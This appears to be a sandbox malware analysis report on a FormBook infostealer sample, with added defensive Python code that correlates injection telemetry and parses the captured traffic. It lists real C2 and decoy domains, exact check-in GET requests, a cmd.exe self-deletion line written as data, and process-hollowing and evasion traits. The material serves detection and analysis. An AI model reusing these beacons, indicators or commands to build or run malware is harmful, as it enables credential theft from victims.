Windows Analysis Report
GV8EJooYMIgEnEk.exe

Overview

General Information

Sample Name: GV8EJooYMIgEnEk.exe
Analysis ID: 562399
MD5: cf6d4fd3dc8e4751b7f89f857b618ef3
SHA1: 15b95f0f1b5785bb7fd3d97757f3eea49d1f6951
SHA256: 9689e8e0cf51b8b5c98ddb007636d8acf7e03c9cc8a7bf99aafdaaebae2dfb3a
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threats rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number, etc.) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file name differs from the original file name recorded in the version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
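The signatures above describe one chain: a child created suspended, a foreign PE mapped into it, thread-context and APC injection, and explorer.exe and a Windows utility (SysWOW64\chkdsk.exe) ending up with the payload in memory and explorer.exe talking to the network. The correlation below is an added example, not part of the Joe Sandbox report: a few host-telemetry rules run over constructed process events. Only the image paths come from the report; the parent/child links, the granted-access masks, the cmd.exe command line and every function name are this example's own assumptions.

```python
"""Correlate host telemetry for the injection chain the signatures describe.
Added example, not part of the Joe Sandbox report.  EVENTS is constructed:
the image paths come from the report, but the parent/child links, the
granted-access masks and the cmd.exe command line are assumptions."""

# Process access rights from winnt.h; Sysmon reports them in GrantedAccess.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
# Writing code into another process and starting it needs all three.
INJECT_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

DROPPER = r"C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CHKDSK = r"C:\Windows\SysWOW64\chkdsk.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"

# Processes already running when the trace starts (constructed).
SEED_TABLE = {0: DROPPER, 5: EXPLORER}

# Constructed events in time order (not taken from the report).
EVENTS = [
    {"t": 1, "type": "ProcessCreate", "pid": 3, "ppid": 0, "image": DROPPER},
    {"t": 2, "type": "ProcessAccess", "source_pid": 0, "target_pid": 3,
     "granted_access": 0x1FFFFF},                     # PROCESS_ALL_ACCESS
    {"t": 3, "type": "ProcessAccess", "source_pid": 3, "target_pid": 5,
     "granted_access": INJECT_RIGHTS},
    {"t": 4, "type": "ProcessCreate", "pid": 10, "ppid": 5, "image": CHKDSK},
    {"t": 5, "type": "ProcessAccess", "source_pid": 5, "target_pid": 10,
     "granted_access": INJECT_RIGHTS},
    {"t": 6, "type": "NetworkConnect", "pid": 5,
     "dst_ip": "199.59.243.200", "dst_port": 80},
    {"t": 7, "type": "ProcessCreate", "pid": 11, "ppid": 10, "image": CMD,
     "command_line": '/c del "' + DROPPER + '"'},
]


def has_inject_rights(mask):
    """True when the access mask covers every right needed to inject code."""
    return mask & INJECT_RIGHTS == INJECT_RIGHTS


def analyse(events=EVENTS, seed=SEED_TABLE):
    """Walk the events once and emit (rule, subject, object) findings."""
    table = dict(seed)   # pid -> image path
    parent = {}          # pid -> parent pid
    injected = {}        # target pid -> first pid that opened it with INJECT_RIGHTS
    findings = []
    for ev in sorted(events, key=lambda e: e["t"]):
        kind = ev["type"]
        if kind == "ProcessCreate":
            pid, image = ev["pid"], ev["image"]
            table[pid] = image
            parent[pid] = ev["ppid"]
            cmd = ev.get("command_line", "").lower()
            # "Self deletion via cmd delete": cmd.exe asked to delete the dropper.
            if image.lower().endswith("\\cmd.exe") and "del " in cmd and DROPPER.lower() in cmd:
                findings.append(("self_delete_via_cmd", pid, ev["ppid"]))
        elif kind == "ProcessAccess":
            if not has_inject_rights(ev["granted_access"]):
                continue
            src, dst = ev["source_pid"], ev["target_pid"]
            injected.setdefault(dst, src)
            target = table.get(dst, "").lower()
            if parent.get(dst) == src and table.get(src) == table.get(dst):
                # A parent writing into a fresh copy of itself: hollowing shape.
                findings.append(("hollowing_candidate", src, dst))
            elif target.endswith("\\explorer.exe"):
                findings.append(("explorer_injection", src, dst))
            elif target.startswith("c:\\windows\\"):
                findings.append(("windows_utility_injection", src, dst))
        elif kind == "NetworkConnect":
            # explorer.exe talking to the network is normal; explorer.exe talking
            # to the network after being opened with write rights is not.
            if ev["pid"] in injected:
                findings.append(("injected_process_beacon", ev["pid"],
                                 f'{ev["dst_ip"]}:{ev["dst_port"]}'))
    return findings


if __name__ == "__main__":
    for rule, subject, obj in analyse():
        print(f"{rule:28} {subject} -> {obj}")
```

The order of the rules matters: a network connection from explorer.exe on its own is noise, so the beacon rule only fires for a process that was earlier opened with write-and-create-thread rights by another process. The "hollowing" shape (a parent opening a just-created copy of itself with full access) is what the report's "Creates a process in suspended mode" and "Sample uses process hollowing technique" signatures correspond to at the telemetry level; Sysmon does not log CREATE_SUSPENDED itself, so the same-image parent/child plus the access mask is the practical proxy.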

Classification

AV Detection

Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook
{
  "C2 list": ["www.cottoneworld.com/cbgo/"],
  "decoy": [
    "tablescaperendezvous4two.net", "abktransportllc.net", "roseevision.com", "skategrindingwheels.com",
    "robux-generator-free.xyz", "yacusi.com", "mgav35.xyz", "paravocecommerce.com",
    "venkatramanrm.com", "freakyhamster.com", "jenaashoponline.com", "dmozlisting.com",
    "lorrainekclark.store", "handyman-prime.com", "thecrashingbrains.com", "ukpms.com",
    "livingstonemines.com", "papeisonline.com", "chrisbakerpr.com", "omnipets.store",
    "anatox-lab.fr", "missingthered.com", "himalaya-nepalorganic.com", "bitcoin-bot.xyz",
    "velarusbet78.com", "redesignyourpain.com", "alonetogetherentertainment.com", "sandywalling.com",
    "solacegolf.com", "charlottesbestroofcompany.com", "stefanybeauty.com", "webarate.com",
    "experiencedlawfirms.com", "lyfygthj.com", "monoicstudios.com", "rgamming.com",
    "mintique.pro", "totalwinerewards.com", "praelatusproducts.com", "daniloff.pro",
    "qmir.digital", "tatasteell.com", "casatowerofficial.com", "sunrisespaandbodywork.com",
    "mgav66.xyz", "bastnbt.com", "fabiulaezeca.com", "sunmountainautomotive.com",
    "madgeniustalk.com", "elite-hc.com", "billcurdmusic.net", "foxclothings.com",
    "adtcmrac.com", "buresdx.com", "tothelaundry.com", "bitconga.com",
    "onlinebiyoloji.online", "up-trend.store", "kaarlehto.com", "interview.online",
    "grantgroupproperties.com", "jpmhomes.net", "yinlimine.xyz", "roadtrippings.com"
  ]
}
Source: GV8EJooYMIgEnEk.exe Virustotal: Detection: 60%
Source: GV8EJooYMIgEnEk.exe Metadefender: Detection: 20%
Source: GV8EJooYMIgEnEk.exe ReversingLabs: Detection: 62%
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: www.cottoneworld.com/cbgo/ Avira URL Cloud: Label: malware
Source: http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf Avira URL Cloud: Label: malware
Source: GV8EJooYMIgEnEk.exe Joe Sandbox ML: detected
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance

Source: GV8EJooYMIgEnEk.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: GV8EJooYMIgEnEk.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: chkdsk.pdbGCTL source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: chkdsk.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: StructuralEqualityCompar.pdb source: GV8EJooYMIgEnEk.exe

Software Vulnerabilities

Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 4x nop then pop edi 3_2_00415681
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop edi 10_2_04AA5681

Networking

Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
Source: C:\Windows\explorer.exe Network Connect: 166.88.62.202 80
Source: C:\Windows\explorer.exe Domain query: www.casatowerofficial.com
Source: C:\Windows\explorer.exe Domain query: www.bitconga.com
Source: C:\Windows\explorer.exe Domain query: www.totalwinerewards.com
Source: C:\Windows\explorer.exe Network Connect: 199.59.243.200 80
Source: C:\Windows\explorer.exe Domain query: www.tothelaundry.com
Source: C:\Windows\explorer.exe Domain query: www.omnipets.store
Source: C:\Windows\explorer.exe Network Connect: 46.252.151.235 80
Source: C:\Windows\explorer.exe Network Connect: 18.231.72.25 80
Source: C:\Windows\explorer.exe Domain query: www.webarate.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.experiencedlawfirms.com
Source: Malware configuration extractor URLs: www.cottoneworld.com/cbgo/
Source: Joe Sandbox View ASN Name: ASSUPERNOVAIT
Source: Joe Sandbox View ASN Name: EGIHOSTINGUS
Source: global traffic HTTP traffic detected:
    GET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1
    Host: www.experiencedlawfirms.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected:
    GET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1
    Host: www.totalwinerewards.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected:
    GET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1
    Host: www.casatowerofficial.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected:
    GET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1
    Host: www.bitconga.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected:
    GET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1
    Host: www.omnipets.store
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (seven NUL bytes, nothing printable)
Source: Joe Sandbox View IP Address: 199.59.243.200
Source: global traffic HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Fri, 28 Jan 2022 19:59:53 GMT
    Content-Type: text/html
    Content-Length: 275
    ETag: "61f22041-113"
    Via: 1.1 google
    Connection: close
    Data Ascii (275 bytes, line breaks as in the raw bytes):
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta http-equiv="content-type" content="text/html;charset=utf-8">
        <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">
        <title>Forbidden</title>
    </head>
    <body>
    <h1>Access Forbidden</h1>
    </body>
    </html>
Source: global traffic HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Fri, 28 Jan 2022 20:00:09 GMT
    Content-Type: text/html
    Content-Length: 275
    ETag: "61f22041-113"
    Via: 1.1 google
    Connection: close
    Data Ascii (275 bytes, identical body to the response above):
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta http-equiv="content-type" content="text/html;charset=utf-8">
        <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">
        <title>Forbidden</title>
    </head>
    <body>
    <h1>Access Forbidden</h1>
    </body>
    </html>
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.micr
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://parking.bodiscdn.com
Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: unknown DNS traffic detected: queries for: www.experiencedlawfirms.com
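Added here as a worked example (not Joe Sandbox output and not code from any FormBook tooling): the captured check-in requests from this section, normalised and compared against the extracted configuration. Everything in CONFIG and OBSERVED is copied from this report (the decoy list is a subset of the 64 entries); the function names and the campaign-shape rule in matches_campaign are this example's own.

```python
"""Check the FormBook check-in requests captured in the report against the
extracted configuration.  Added example, not part of the Joe Sandbox report.
CONFIG and OBSERVED are copied from the report (the decoy list is a subset
of the 64 entries); the helper names are this example's own."""
from urllib.parse import urlsplit

CONFIG = {
    "c2": ["www.cottoneworld.com/cbgo/"],
    "decoy": [  # subset of the report's decoy list
        "casatowerofficial.com", "bitconga.com", "totalwinerewards.com",
        "omnipets.store", "experiencedlawfirms.com", "tothelaundry.com",
        "webarate.com", "skategrindingwheels.com", "robux-generator-free.xyz",
    ],
}

# (request line, Host header) pairs as captured in the report.
OBSERVED = [
    ("GET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1",
     "www.experiencedlawfirms.com"),
    ("GET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1",
     "www.totalwinerewards.com"),
    ("GET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1",
     "www.casatowerofficial.com"),
    ("GET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1",
     "www.bitconga.com"),
    ("GET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1",
     "www.omnipets.store"),
]


def registered_host(host):
    """Lower-case and drop a leading 'www.' so hosts match the bare decoy entries."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def parse_checkin(request_line, host):
    """Split a request line into method, path and raw query parameters.
    The query is split by hand: parse_qsl would turn '+' into a space and
    corrupt the base64-looking 4hPx value."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    params = {}
    for pair in parts.query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            params[key] = value
    return {"method": method, "host": registered_host(host),
            "path": parts.path, "params": params}


def classify_host(host, config=CONFIG):
    """'c2' for the configured C2 host, 'decoy' for a configured decoy, else 'unknown'."""
    host = registered_host(host)
    c2_hosts = {registered_host(urlsplit("http://" + u).hostname) for u in config["c2"]}
    if host in c2_hosts:
        return "c2"
    if host in {registered_host(d) for d in config["decoy"]}:
        return "decoy"
    return "unknown"


def matches_campaign(parsed):
    """Shape of this sample's check-in: fixed path, fixed Xf3 pair, one
    variable 4hPx value.  Path and parameter names are taken from this
    report's traffic; they are specific to this configuration."""
    p = parsed["params"]
    return parsed["path"] == "/cbgo/" and set(p) == {"Xf3", "4hPx"} and p["Xf3"] == "7nL8"


def checkin_profile(observed=OBSERVED, config=CONFIG):
    """Summarise what is constant and what varies across the captured requests."""
    parsed = [parse_checkin(line, host) for line, host in observed]
    markers = {p["params"].get("Xf3") for p in parsed}
    payloads = [p["params"].get("4hPx") for p in parsed]
    labels = {p["host"]: classify_host(p["host"], config) for p in parsed}
    return {
        "paths": {p["path"] for p in parsed},
        "marker": markers.pop() if len(markers) == 1 else None,
        "payloads_unique": len(set(payloads)) == len(payloads),
        "all_match_campaign": all(matches_campaign(p) for p in parsed),
        "labels": labels,
        "c2_contacted": "c2" in labels.values(),
    }


if __name__ == "__main__":
    for key, value in checkin_profile().items():
        print(f"{key}: {value}")
```

Run against the captured traffic, every host the sandbox reached is a decoy from the configuration and the configured C2 (www.cottoneworld.com/cbgo/) was not contacted during the run. That drives how the indicators should be used: block the configured C2 outright, but treat the decoys as unrelated third-party domains and hunt on the request shape instead (fixed /cbgo/ path, fixed Xf3=7nL8 pair, one base64-looking 4hPx value that changes per request, no User-Agent header, a seven-NUL-byte body), which is also what the three ET FormBook CnC Checkin rules fired on. The path and parameter names are specific to this sample's configuration and should not be expected to hold for other builds.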

E-Banking Fraud

Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
